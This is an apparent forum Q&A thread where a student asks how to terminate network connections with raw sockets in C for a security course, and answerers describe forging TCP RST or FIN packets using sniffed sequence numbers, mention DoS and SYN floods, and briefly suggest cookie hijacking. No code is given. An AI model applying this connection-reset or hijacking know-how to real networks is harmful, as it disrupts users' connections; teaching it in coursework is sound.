views:

70

answers:

4

i have to write a program that sniffs network packets (part1-the simple part).
and i have to update the program (part2) so that it will be able to terminate connections.
the specific requirements are:
construct raw packets by specifying data link layer and network layer information including appropriate source and destination MAC and IP addresses. These packets are intended to terminate the connection. To do so, you should used SOCK_RAW as the socket type to be able to set the header information by yourself.
can anybody give me some ideas on the second part?
should i hijack the session,apply a dos attack on one of the users??

all i need is some tips of how to terminate the connection. i am using c programming language. and this is a course assignment for the security course.

A: 

Depends on what you mean by terminate connections. You might mean providing an end-point for a TCP circuit or UDP stream.

Or you could mean sending an acceptable RST in the middle of a TCP stream to indicate the end of the stream. To achieve this you have to know the sequence number expected by the other side amongst other things.

Either way it is obvious you haven't been paying attention in class. The entire point of the assignment, it seems, is to show you understand the raw layout of IP packets and possibly TCP/UDP. I suggest you purchase a textbook on the subject (no doubt recommended by your lecturer) and/or take a read of Wikipedia.

PP
actually i couldn't attend class on the day the assignment was issued, therefore i am not 100% sure abt the requirements.anyway i read abt RST, i think i will be able to implement such thing :) do you have any other ideas? is it possible to DOS one of the users on one of his open ports (so i can close the port?) can i send a FIN packet to one of the users?
scatman
Yes you can DOS, yes you can send FIN packets, in fact you can send any packet you want. The information is out there on the Internet and, it seems, on tap at your university. So if you choose to neither attend lectures nor discover basic networking concepts on your own time then of course you can't solve this problem. And I'm not solving it for you!
PP
+1  A: 

For this assignment I would use pypacp, which is a python packet capture and injection library. Pypcap uses raw sockets to forge packets. If for some strange reason you are forced to use C then this project will be more difficult. In this case you should use libpcap to sniff the line and the raw socket library will depend on the platform you develop on.

You can sniff the line looking for TCP sequence ID's. Based on this id you can forge a RST or FIN to break one side of the connection. The hard part will be trying to maintain the TCP connection using raw sockets. It will be nearly impossible to maintain the application layer connection, HTTP would be an easier protocol to maintain but if it was http it would be easier to just hijack the cookie.

Rook
A: 

I can't help you with C libraries - not my forte, but it seems like there should be something out there.

But it seems like what you are trying to do in part 2 is to prevent a DOS, not cause one!

Check here:

http://en.wikipedia.org/wiki/Denial-of-service_attack

for stuff on DoS attacks. As PP says, there are a number of attacks relating to connection misuse, so you want to figure out which one your assigment is about - that one you need to check out with your prof. For example, the Wiki page above mentions SYN Floods - but almost any connection oriented protocol will be at risk for an attack that fills up the connection pool with too many connection requests and then doesn't ever close them.

I assume, reading the assignment, that your job is to figure out how to fix this by closing the connections that the attacker opened. Which means you both have to figure out how the attack works, and then figure out how to recover from it.

HINT: Hitting the server with a flood of close-connection requests is not an attack. It's not that useful, either, since you aren't necessarily closing the connections that are open. But the damage is caused by open-connection requests. See here:

http://en.wikipedia.org/wiki/SYN_flood

For one example.

bethlakshmi
A: 

you can use libpcap to help with the packet sniffing. libpcap was developed by the tcpdump team.